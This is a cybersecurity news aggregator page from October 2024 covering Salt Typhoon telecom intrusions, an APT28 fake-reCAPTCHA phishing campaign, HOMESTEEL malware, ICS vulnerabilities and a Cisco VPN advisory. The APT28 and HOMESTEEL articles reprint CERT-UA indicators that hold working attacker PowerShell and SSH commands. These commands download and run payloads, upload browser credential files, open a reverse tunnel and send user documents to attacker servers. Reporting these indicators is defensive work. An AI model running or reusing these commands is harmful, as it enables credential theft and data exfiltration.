Oktacron logo
Cyber security aggregate rss news

Cyber security aggregator - feeds history
image for Chinese Hackers Targ ...

 Cyber News

Chinese hackers who earlier this month infiltrated the U.S. wiretap system have apparently expanded their telecom network access to target data from phones used by Republican presidential candidate Donald Trump and vice presidential candidate JD Vance. The “Salt Typhoon” group apparently also targeted “prominent   show more ...

figures on Capitol Hill and possibly staff members of Vice President Kamala Harris’s campaign,” according to a New York Times report today, and the Wall Street Journal reported that companies were targeted too. The officials’ phone numbers were targeted “through the infiltration of Verizon phone systems,” the Times said. In a joint statement today, the FBI and CISA said they are “investigating the unauthorized access to commercial telecommunications infrastructure by actors affiliated with the People’s Republic of China.” The statement did not provide details but said the FBI “identified specific malicious activity targeting the sector.” FBI and CISA “immediately notified affected companies, rendered technical assistance, and rapidly shared information to assist other potential victims.” U.S. agencies “are collaborating to aggressively mitigate this threat and are coordinating with our industry partners to strengthen cyber defenses across the commercial communications sector,” the statement concluded. Not Clear What Data Chinese Hackers Accessed It’s not clear what data the hackers accessed and whether it included text messages. The investigation is ongoing, and the FBI and U.S. national security officials “have signaled that they are deeply concerned about the potential extent of compromised data and the wide range of possible victims,” the Times said. The hackers may still be inside Verizon’s systems, the report said. The Wall Street Journal reported that "Investigators now believe that the hackers gained access to U.S. telecommunications infrastructure and targeted or compromised at least several dozen different companies and people." They also targeted a Wall Street Journal reporter, the paper said. Foreign Election Interference Widespread Even by the standards of the last two presidential election cycles, the 2024 race has been marked by an extremely high level of foreign disinformation and hacking campaigns, with Russia, China and Iran the most active of those foreign actors. Perhaps most noteworthy was an August hack of the Trump campaign by Iran. The documents stolen by the Iranian hackers – which included a 271-page research dossier on Vance – have gone unpublished by U.S. media, but Reuters reported this week that some of those documents have begun to trickle out on Substack and other platforms. Earlier this week, a report by Microsoft said another Iranian group – “Cotton Sandstorm” – is targeting election-related websites and media outlets. The Microsoft report noted “sustained influence efforts by Russia, Iran, and China aimed at undermining U.S. democratic processes.” And The Washington Post this week reported on a former Florida deputy sheriff “who fled to Moscow and became one of the Kremlin’s most prolific propagandists,” working with Russian military intelligence to create deepfakes and circulate disinformation targeting the Harris campaign. Election Infrastructure Secure; Disinformation is the Threat Throughout the blizzard of disinformation and hacking campaigns, U.S. cybersecurity and national security officials have made clear that the U.S. election system is safe, and that disinformation is the much bigger problem. CISA Director Jen Easterly reiterated those views in a LinkedIn post this week. “Whoever you vote for, you can be confident that your vote will be counted as cast,” Easterly said. “Elections are political; election security is not. Despite the firehose of inaccurate info about election security being spread by foreign adversaries intent on weakening our country and pitting Americans against each other, the fact is that election infrastructure has never been more secure and our election officials have never been better prepared to deliver safe, secure, free, and fair elections.” One top U.S. election observer – David Becker, executive director and founder of The Center for Election Innovation & Research – agrees that disinformation is the bigger risk. Becker notes that fewer than 2% of all U.S. voters this November will vote on machines without any paper ballot or backup, and those voters reside only in Louisiana (statewide) and a few counties in Texas. “The threat of ‘hacking’ of machines is quite overblown, given the success advocates have had in promoting paper ballots and audits nationwide, along with disconnection from the internet,” Becker told The Cyber Express earlier this fall in a report for Cyble. “It is a high risk, low reward endeavor, which, even if attempted, would almost certainly be detected and prosecuted, and the existence of verifiable paper ballots means the election could be reconstructed.”

image for ‘I’m not a Robot ...

 Espionage

Ukraine is confronting a new cyberattack vector from Russian military intelligence (GRU) connected hackers that is targeting local governments. The Computer Emergency Response Team of Ukraine (CERT-UA) recently uncovered an advanced phishing campaign by the Russian GRU-linked APT28, or "Fancy Bear." Using a   show more ...

novel approach, attackers lure recipients into executing malicious PowerShell commands directly from their clipboard—a new technique for delivering malware with minimal interaction. Google's reCAPTCHA Lookalike Emails flagged by CERT-UA were found circulating within local government offices under the subject line “Table Replacement.” Instead of standard attachments, these emails embed a link mimicking a Google spreadsheet. Clicking the link initiates an imitation of Google’s reCAPTCHA, a tactic used to disarm suspicion by mimicking a bot prevention screen. However, unlike legitimate reCAPTCHA prompts, this decoy performs an unseen action: it copies a malicious PowerShell command directly to the user's clipboard. Following this, instructions prompt users to press "Win+R," which opens the command prompt, followed by "Ctrl+V" to paste and then "Enter" to execute it. Once executed, the payload launches, compromising the system. [caption id="attachment_91981" align="aligncenter" width="800"] The Trojanized Google reCAPTCHA and the PowerShell scripts it runs. (Source: CERT-UA)[/caption] APT28's tactics demonstrate how these groups exploit familiar actions in routine tasks to mask their intentions. This technique capitalizes on basic system functions and leverages users’ trust in seemingly benign prompts, such as bot verification. CERT-UA analysis reveals that the command initiates a download and execution sequence. It launches “browser.hta,” a malicious HTML application, which in turn executes “Browser.ps1,” a PowerShell script designed to steal data from popular browsers, including Chrome, Edge, Opera, and Firefox. Additionally, it uses an SSH tunnel for exfiltration, allowing stolen credentials and other sensitive data to be transported directly to the attackers. One of the more concerning aspects involves the script’s capability to download and run the Metasploit framework, a tool used widely in penetration testing but increasingly getting popular among threat actors. Fancy Bear Gets Fancy with its Expanding Arsenal This isn’t the first time Ukrainian entities faced APT28’s targeted operations. CERT-UA reported in September that the group used a Roundcube email vulnerability (CVE-2023-43770) to redirect email data. [caption id="attachment_91983" align="aligncenter" width="800"] The malicious scripts run post Roundcube vulnerability exploitation (Source; CERT-UA)[/caption] Exploiting this vulnerability enabled attackers to implant a filter that auto-forwarded emails to an attacker-controlled address. During that attack, CERT-UA found that at least ten compromised government email accounts were used to transmit further exploits to Ukrainian defense contacts. In both attacks, APT28 used a compromised server, mail.zhblz[.]com, for control. The IP linked to this server (203.161.50[.]145) has surfaced in prior campaigns, signifying APT28’s evolving operational infrastructure to evade detection while maintaining continuity across attacks. With APT28’s ongoing activity, CERT-UA has recommended that government agencies be on the lookout of increasingly targeted spear-phishing campaigns designed to exploit both user trust and routine tasks. Also read: Russian Hacker Group APT28 Launches HeadLace Malware via Fake Car Ads to Target Diplomats Indicators of Compromise Shared by CERT-UA File Hashes: e9cb6270f09e3324e6620b8c909a83c6 d34ee70f162ce1dab6a80a6a3c8dabd8d2b1a77345be5b1d956c765752b11802 Browser.ps1   d73124dbb5d8e5702df065a122878740 4e1bc758f08593a873e5e1d6f7d4eac05f690841abc90ddfa713c2bec4f9970f Browser.ps1   597bd15ff25636d9cde61157c2a3c8a2 5200a4e1bb5174a3203ce603c34625493a5a88f0dfb98ed5856b18655fb7ba60 browser.hta   446bab23379df08fecbab6fe9b00344e 3ec9a66609f1bea8f30845e5dbcf927cf0b3e92e40ef40272fdf6d784ba0d0af zapit.exe [METASPLOIT] f389247be7524e2d4afc98f6811622fe e3a3abf8c80637445bab387be288b6475992b6b556cb55a5a8c366401fb864c5 rdp.exe   981943d2e7ec0ab3834c639f49cc4b42 6bbf2b86e023f132416f40690b0386bd00e00cf3e1bef725dec92df7f1cd1007 id_rsa   d26920b81f4e6b014a0d63169e68dfa7 edb81219b7728fa2ea1d97d5b3189f498ed09a72b800e115f12843f852b2a441 ssh.exe (legit)   d1ccc802272a380b32338d17b2ac40a1 2446ab2e4dc85dc8b27141b2c1f777a01706f16d6608f4b5b0990f8b80dea9e0 libcrypto.dll (legit) Network: hXXps://docs.google.com.spreadsheets.d.1ip6eeakdebmwteh36vana4hu-glaeksstsht-boujdk.zhblz[.]com/document (tcp)://mail.zhblz[.]com:8443 hXXps://mail.zhblz[.]com hXXps://mail.zhblz[.]com/B hXXps://mail.zhblz[.]com/b hXXps://mail.zhblz[.]com/endpoint hXXps://mail.zhblz[.]com/upload hXXps://mail.zhblz[.]com/z hXXps://mail.zhblz[.]com/id_rsa hXXps://mail.zhblz[.]com/libcrypto hXXps://mail.zhblz[.]com/ssh (tcp)://203[.]161.50.145:22 (tcp)://203[.]161.50.145:6211 (tcp)://45[.]61.169.221:445 doc.gmail.com.gyehddhrggdii323sdhnshiswh2udhqjwdhhfjcjeuejcj.zhblz[.]com docs.google.com.spreadsheets.d.1ip6eeakdebmwteh36vana4hu-glaeksstsht-boujdk.zhblz[.]com mail.zhblz[.]com 203[.]161.50.145     45[.]61.169.221      Indicators from incident CERT-UA#10859 (unauthorized access to mailboxes) 103[.]50.33.50 103[.]50.33.54 109[.]236.63.165 185[.]197.248.94 194[.]35.121.200 194[.]35.121.202 194[.]35.121.50 195[.]64.155.64 198[.]54.117.242 203[.]161.50.145 37[.]19.218.144 37[.]19.218.146 37[.]19.218.156 37[.]19.218.157 37[.]19.218.160 37[.]19.218.168 37[.]19.218.174 37[.]19.218.183 45[.]155.43.118 45[.]155.43.121 45[.]94.211.159 45[.]94.211.161 45[.]94.211.164 80[.]77.25.206 95[.]214.216.76 95[.]214.216.78 95[.]214.217.94 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36 Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:129.0) Gecko/20100101 Firefox/129.0 exchangelib/5.4.2 (python-requests/2.32.3) Hosts: %APPDATA%id_rsa %APPDATA%zapit.exe %APPDATA%ssh.exe %APPDATA%libcrypto.dll C:UsersMalgussource epos dp dpobjDebug dp.pdb mshta https://mail.zhblz.com/b ssh recaptcha@203.161.50.145 -N -i %APPDATA%id_rsa -R 0 -o StrictHostKeyChecking=no -o "PermitLocalCommand=yes" -o "LocalCommand=ssh -i \45.61.169.221key.pem user@1.1 .1.1" %APPDATA%ssh.exe recaptcha@203.161.50.145 -N -i %APPDATA%id_rsa -R 0 -o StrictHostKeyChecking=no powershell -WindowStyle Hidden -nop -exec bypass -c "iex (New-Object Net.WebClient).DownloadString('https://mail.zhblz.com/B');pumpndump -hq https://mail.zhblz. com;mshta https://mail.zhblz.com/b # ✅ ''I am not a robot - reCAPTCHA ID: {verification_id}''" powershell -WindowStyle Hidden -nop -exec bypass -c "Invoke-RestMethod -Uri https://mail.zhblz.com/upload -Method Post -Body (@{filename='logins.json';file='<Base64EncodedData> '}|ConvertTo-Json) -ContentType 'application/json'" powershell -WindowStyle Hidden -nop -exec bypass -c "Invoke-RestMethod -Uri https://mail.zhblz.com/upload -Method Post -Body (@{filename='key4.db';file='<Base64EncodedData> '}|ConvertTo-Json) -ContentType 'application/json'" powershell -WindowStyle Hidden -nop -exec bypass -c "Invoke-WebRequest -Uri https://mail.zhblz.com/libcrypto -OutFile %APPDATA%libcrypto.dll" powershell -WindowStyle Hidden -nop -exec bypass -c "Invoke-WebRequest -Uri https://mail.zhblz.com/ssh -OutFile %APPDATA%ssh.exe" powershell -WindowStyle Hidden -nop -exec bypass -c "Invoke-WebRequest -Uri https://mail.zhblz.com/z -OutFile %APPDATA%zapit.exe" powershell -WindowStyle Hidden -nop -exec bypass -c "Invoke-WebRequest https://mail.zhblz.com/id_rsa -OutFile $env:APPDATAid_rsa"  

image for Critical Vulnerabili ...

 Vulnerabilities

Cyble Research & Intelligence Labs (CRIL) has shared its weekly ICS vulnerability report, highlighting multiple vulnerabilities affecting industrial control systems (ICS). This weekly industrial control system vulnerability blog emphasizes the critical need for quick action in mitigating these threats.   The   show more ...

findings were released by the Cybersecurity and Infrastructure Security Agency (CISA) for the week of October 15 to October 21, 2024, detailing 13 vulnerabilities spanning several well-known manufacturers, including Siemens and Schneider Electric.  ICS Vulnerability Report Sheds Light on Major Flaws  During the specified period, CISA published seven security advisories that spotlighted vulnerabilities across multiple companies, namely Siemens, Schneider Electric, Elvaco, Mitsubishi Electric, HMS Networks, Kieback&Peter, and LCDS – Leão Consultoria e Desenvolvimento de Sistemas Ltda ME. Among these, Elvaco reported four vulnerabilities, while Kieback&Peter highlighted three.  Particular attention is drawn to vulnerabilities impacting the Elvaco CMe3100 and Kieback&Peter DDC4000 Series. The Elvaco CMe3100, a compact communication gateway designed for remote energy meter reading, has been exposed online in numerous instances—1,186 to be exact - primarily located in Sweden, according to Cyble’s ODIN scanner. In contrast, Kieback&Peter’s DDC4000 Series, utilized predominantly in HVAC management, has shown eight instances that require immediate action.  Detailed Vulnerability Insights  The vulnerabilities reported offer essential insights that organizations should prioritize when planning their patching efforts. Among the critical vulnerabilities identified are:  CVE-2024-3506: This medium-severity vulnerability affects Siemens’ Siveillance Video Camera. All versions prior to V13.2 are susceptible to a classic buffer overflow, potentially compromising physical access controls and CCTV operations.  CVE-2023-8531: Schneider Electric's Data Center Expert is vulnerable in versions 8.1.1.3 and earlier. This high-severity flaw involves improper verification of cryptographic signatures, impacting various control systems including DCS, SCADA, and BMS.  CVE-2024-49396 and CVE-2024-49398: Elvaco's CMe3100, particularly version 1.12.1, faces critical risks from insufficiently protected credentials (CVE-2024-49396) and the unrestricted upload of dangerous file types (CVE-2024-49398).  CVE-2024-41717: Kieback&Peter’s DDC4002 and related versions encounter a critical path traversal vulnerability, which could significantly impact field controllers and IoT devices.  These findings highlight a troubling trend in the ICS sector, where high-severity vulnerabilities are increasingly prevalent. Organizations must remain vigilant and adopt robust mitigation strategies in response to these flaws highlighted in the weekly ICS vulnerability report.   Recommendations for Enhanced Cybersecurity  In light of the vulnerabilities highlighted in the weekly industrial control system vulnerability blog, Cyble Research & Intelligence Labs (CRIL) recommends that organizations actively monitor security advisories, adopt a risk-based vulnerability management approach with a Zero-Trust framework, and enhance patch management by tracking critical vulnerabilities in CISA’s Known Exploited Vulnerabilities (KEV) catalog.   Additionally, organizations should develop comprehensive patch strategies that include inventory management, assessment, testing, deployment, and verification of patches, employing automation for greater efficiency. Effective network segmentation is essential to limit lateral movement of attackers, while ongoing audits, vulnerability assessments, and penetration testing are crucial for identifying and addressing security gaps. Establishing continuous monitoring and logging capabilities will allow for early detection of network anomalies, and leveraging a Software Bill of Materials (SBOM) can improve visibility into software components and their vulnerabilities. With significant threats facing major vendors like Siemens and Schneider Electric, it is important for businesses to adopt these proactive measures to enhance their cybersecurity and protect critical infrastructure. 

image for HOMESTEEL Malware Em ...

 Malware News

A recent cyber campaign by the threat actor tracked as UAC-0218 has introduced a new malware variant called HOMESTEEL that targets critical Ukrainian data repositories. This latest offensive, flagged by Ukraine’s Computer Emergency Response Team (CERT-UA), reflects the modus operandi of Ukraine's adversaries who   show more ...

aim to steal sensitive information from government and business networks. CERT-UA identified the phishing methods, which include emails baiting recipients through familiar subject lines like "account" and "details" and linking to a seemingly legitimate “eDisk” platform. The eDisk link directs users to download RAR files that house malicious content, embedding two password-protected files labeled as “Contract20102024.doc” and “Invoice20102024.xlsx.” A concealed Visual Basic Script (VBS) file, “Password.vbe,” ultimately initiates HOMESTEEL's data-siphoning operations. The primary target files, such as those ending in “xls,” “xlsx,” “doc,” and “pdf,” are systematically collected from user directories up to five subfolders deep. HOMESTEEL’s code commands a recursive search, transmitting files under 10MB to an external server through an HTTP PUT request. This approach minimizes data size to evade potential detection while maximizing data collection. HOMESTEEL's Proxy Use Elevates Attack Complexity UAC-0218’s techniques appear particularly well-tailored to the environment. HOMESTEEL can adapt to proxy settings on compromised systems, further camouflaging its network traffic. CERT-UA reported that each outgoing request to the attacker’s server contains the full path of the extracted file, which may assist attackers in cataloging sensitive files across compromised systems. This level of customization suggests a level of surveillance intelligence typically seen in more complex, persistent attacks. A notable aspect of the HOMESTEEL malware lies in its reliance on PowerShell, a command-line shell in Windows environments widely exploited in cyber operations. CERT-UA researchers found an additional executable acting as a self-extracting archive with embedded PowerShell commands. These commands initiate further file reconnaissance, scanning user directories for extensions like xls*, doc*, pdf and eml, and dispatching files to a central server via HTTP POST requests. This double-methodology showcases HOMESTEEL’s resilience, as it attempts to bypass any security hurdles the initial infection vector encounters. Infrastructure Tactics Link Campaign to August Origins The CERT-UA findings link UAC-0218’s activities back to August 2024, based on the domain registration data of its command infrastructure. Ukrainian cyber defenders on Wednesday revealed another campaign that began in August with a similar intent but no links between the two could be established as the threat actor in that case is tracked as UAC-0215. The attackers leveraged HostZealot, a domain name registrar, and configured a custom Python-based web server as the central data-receiving platform. The server reveals a distinctive "Python Software Foundation BaseHTTP 0.6" banner, helping analysts attribute this campaign to the same infrastructure used in prior UAC-0218 attacks. By reusing components across multiple operations, UAC-0218 demonstrates a persistent strategy that leverages existing digital assets to increase efficiency and reduce overhead. The HOMESTEEL campaign raises pressing concerns for Ukraine’s government, which has long battled cyber aggression. As cyber espionage campaigns against Ukraine continue to evolve, CERT-UA's proactive monitoring of UAC-0218 indicates a critical awareness of threats that leverage evolving malware tactics and refined phishing methodologies. Indicators of Compromise as shared by CERT-UA File Hashes: 10d486a514212bff2ef181010e8bd421 3432fe8487b72860cf60b54169f071e26336c56ff078ff78a13e8e29a02b4424 _№_601.rar dc7e9ab6374bccf3225d95ed4595a608 1679e968b0672342091b2bef5c379767bc59bf575f7ed8d9c6abbdc10fcafe01 Account20102024.xlsx 16e2255474930bab59d59a62caf35a5b 7dd938f2b0d809a80e9e3bf80f9c9d5b27145962871fdc19772ecda95b948abb Agreement 20102024.doc 7c95cd4b9471c904db3a5afc9179b3bc c95fcee5b3daace259c4f31f699c4fca82da7ebc8ed950caa630ca763b2b3e15 Password.vbe cd03aa7bc1b1f2b64f0c6856ba312484 f541d5c6338d65afba2245685ac1189b44c90393d7e67b70289e1f28b6da6c52 WEXTRACT.EXE d7a120fee99b0655a08f330a4542f141 465c8bbf75a1717546450cf88aa53d4e12345ab2c776b99dbef1c147da34966a install.txt 325a5308c225ed14355d5afcd12a059c 4ba64f21fb69f2b10debdcf9f8424d0090c98d4dfb3d0d0f9faac0458ba9ae00 POSTRUNPROGRAM 62febd43f2253710adaeea3a0639d26d b8e6665682f4a0a70dcbd4134441041f290fc8b357503ab122fc09911a8a9629 RUNPROGRAM Network: hXXps://edisk.in[.]ua/571df09c9c45758/Invoice No. 1712-327.rar hXXps://edisk.in[.]ua/571df09c9c45758/Invoice No. 3881-251.rar hXXps://edisk.in[.]ua/571df09c9c45758/Invoice No. 612-118.rar hXXps://edisk.in[.]ua/571df09c9c45758/Invoice No. 692-251.rar hXXps://edisk.in[.]ua/571df09c9c45758/account No. 1712-327.rar hXXps://edisk.ukrnet.01mirror.com[.]ua/571df09c9c45758/ №_601.rar hXXps://edisk.ukrnet.01mirror.com[.]ua/571df09c9c45758/Invoice No. 6492-115.rar hXXps://edisk.ukrnet.01mirror.com[.]ua/571df09c9c45758/2024-10-10_001.rar hXXps://staticgl[.]one/ hXXps://winupmirror[.]support/ edisk.ukrnet.01mirror.com[.]ua ukrnet.01mirror.com[.]ua 01mirror.com.ua 2024-10-10 ukrnames.com swiftydns.com edisk.in.ua 2024-10-23 ukrnames.com swiftydns.com winupmirror.support 2024-10-09 namecheap.com swiftydns.com staticgl.one 2024-08-23 namecheap.com registrar-servers.com 109[.]205.195.233 (C2) 194[.]107.92.234 (X-Originating-IP) 46[.]149.173.221 (X-Originating-IP) 94[.]140.114.32 94[.]140.114.76 Hosts: HKLMSoftwareMicrosoftWindowsCurrentVersionRunOncewextract_cleanup0 powershell.exe "(New-Object -ComObject Wscript.Shell).Popup('Error! OS Not Supported!')" powershell.exe "[Net.ServicePointManager]::SecurityProtocol='Tls12';foreach($fil in dir $HOME -include('*.xls*','*doc*','*.pdf','*. eml','*.sqlite','*.pst','*.txt') -recurse | %{$_.FullName}){iwr https://staticgl.one/$fil -Method POST -infile $ file}"

image for Cisco Patches Critic ...

 Firewall Daily

Cisco Systems released a critical advisory regarding a vulnerability in the Remote Access VPN (RAVPN) service associated with its Adaptive Security Appliance (ASA) and Firepower Threat Defense (FTD) software. This vulnerability could allow an unauthenticated, remote attacker to execute a denial of service (DoS) attack   show more ...

against the RAVPN service, impacting organizations relying on these essential security tools.  The Common Vulnerability Scoring System (CVSS) score for this issue is 5.8. This vulnerability is identified by the CVE identifier CVE-2024-20481 and falls under the CWE classification of CWE-772.   Decoding Adaptive Security Appliance (ASA) and Firepower Threat Defense (FTD) software The investigation into these Cisco vulnerabilities revealed that they stem from resource exhaustion. An attacker could exploit this weakness by sending many VPN authentication requests to an affected device.   [caption id="attachment_91950" align="alignnone" width="935"] Source: CISCO[/caption] Such an assault could exhaust system resources, resulting in a complete denial of service for the RAVPN service. In the event of a successful exploitation, the affected device may need to be rebooted to restore functionality. Importantly, services unrelated to the VPN remain unaffected by this vulnerability.   Cisco's security research team recently highlighted the rising trend of brute-force attacks targeting VPNs and SSH services that leverage commonly used login credentials. These advisory highlights the critical need for better security measures in network environments.  Impacted Products At the time of the advisory's publication, Cisco ASA and FTD software running vulnerable releases with the RAVPN service enabled were at risk. Organizations using these products should verify their software version against the advisory's guidelines to determine vulnerability status. Notably, there are currently no workarounds available to mitigate this specific vulnerability, making immediate action essential for affected users.   Cisco has confirmed that several of its products are not affected by the identified vulnerability. The products that are considered non-vulnerable include IOS Software, IOS XE Software, and Meraki products. Additionally, NX-OS Software and Secure Firewall Management Center (FMC) Software are also confirmed to be unaffected.   Organizations can check if the SSL VPN feature is enabled on their devices by executing the command: show running-config webvpn | include ^ enable. If the command returns output, it indicates that SSL VPN is active; conversely, no output confirms that it is not enabled and therefore not vulnerable. For example, if the command returns the output enable outside, it signifies that the SSL VPN feature is enabled, which may indicate potential vulnerability for the device.   Recommendations for Mitigation Cisco emphasizes the importance of upgrading to the latest software versions to address a vulnerability, as there are no direct workarounds available. Organizations should regularly consult Cisco’s security advisories to stay informed and ensure they are using updated software.   When upgrading Cisco ASA or FTD devices, it's crucial to check for sufficient memory and compatibility with current hardware. After upgrading, organizations should review the "Configure Threat Detection for VPN Services" section in the Cisco Secure Firewall ASA CLI Configuration Guide to enhance protections against various VPN-related attacks.   The advisory highlights the urgent need for organizations using Cisco Adaptive Security Appliance and Firepower Threat Defense Software to respond promptly to the identified vulnerability affecting the Remote Access VPN service. Proactive monitoring, timely upgrades, and strong security practices are essential for safeguarding network infrastructures. For further details, organizations can refer to the full advisory linked in the original document. It’s vital to implement recommended actions to mitigate risks and remain vigilant against online threats. 

 Feed

Faraday is a tool that introduces a new concept called IPE, or Integrated Penetration-Test Environment. It is a multiuser penetration test IDE designed for distribution, indexation and analysis of the generated data during the process of a security audit. The main purpose of Faraday is to re-use the available tools in the community to take advantage of them in a multiuser way.

 Feed

Adversary3 malware vulnerability intel tool for third-party attackers living off malware (LOM), updated with 700 malware and C2 panel vulnerabilities.

 Feed

Red Hat Security Advisory 2024-8455-03 - An update for edk2 is now available for Red Hat Enterprise Linux 8.6 Advanced Mission Critical Update Support, Red Hat Enterprise Linux 8.6 Update Services for SAP Solutions, and Red Hat Enterprise Linux 8.6 Telecommunications Update Service. Issues addressed include a buffer overflow vulnerability.

 Feed

Red Hat Security Advisory 2024-8449-03 - An update for edk2 is now available for Red Hat Enterprise Linux 8.4 Advanced Mission Critical Update Support, Red Hat Enterprise Linux 8.4 Telecommunications Update Service, and Red Hat Enterprise Linux 8.4 Update Services for SAP Solutions. Issues addressed include a buffer overflow vulnerability.

 Feed

Red Hat Security Advisory 2024-8260-03 - Red Hat OpenShift Container Platform release 4.16.18 is now available with updates to packages and images that fix several bugs and add enhancements. Issues addressed include a denial of service vulnerability.

 Feed

The Irish data protection watchdog on Thursday fined LinkedIn €310 million ($335 million) for violating the privacy of its users by conducting behavioral analyses of personal data for targeted advertising. "The inquiry examined LinkedIn's processing of personal data for the purposes of behavioral analysis and targeted advertising of users who have created LinkedIn profiles (members)," the Data

 Feed

Apple has publicly made available its Private Cloud Compute (PCC) Virtual Research Environment (VRE), allowing the research community to inspect and verify the privacy and security guarantees of its offering. PCC, which Apple unveiled earlier this June, has been marketed as the "most advanced security architecture ever deployed for cloud AI compute at scale." With the new technology, the idea is

 Feed

Artificial Intelligence (AI) has rapidly evolved from a futuristic concept to a potent weapon in the hands of bad actors. Today, AI-based attacks are not just theoretical threats—they're happening across industries and outpacing traditional defense mechanisms.  The solution, however, is not futuristic. It turns out a properly designed identity security platform is able to deliver defenses

 Feed

The U.S. Securities and Exchange Commission (SEC) has charged four current and former public companies for making "materially misleading disclosures" related to the large-scale cyber attack that stemmed from the hack of SolarWinds in 2020. The SEC said the companies – Avaya, Check Point, Mimecast, and Unisys – are being penalized for how they handled the disclosure process in the aftermath of

 Feed

A security flaw impacting the Wi-Fi Test Suite could enable unauthenticated local attackers to execute arbitrary code with elevated privileges. The CERT Coordination Center (CERT/CC) said the vulnerability, tracked as CVE-2024-41992, said the susceptible code from the Wi-Fi Alliance has been found deployed on Arcadyan FMIMG51AX000J routers. "This flaw allows an unauthenticated local attacker to

 Guest blog

A US $10 million reward is being offered to anyone who has information about four members of an Iranian hacking group. The US government's Rewards for Justice initiative is making the reward available for information about four men believed to be members of Shahid Hemmat, a hacking gang backed by Iran's   show more ...

Islamic Revolutionary Guard Corps Cyber-Electronic Command (IRGC-CEC). Read more in my article on the Hot for Security blog.

2024-10
Aggregator history
Friday, October 25
TUE
WED
THU
FRI
SAT
SUN
MON
OctoberNovemberDecember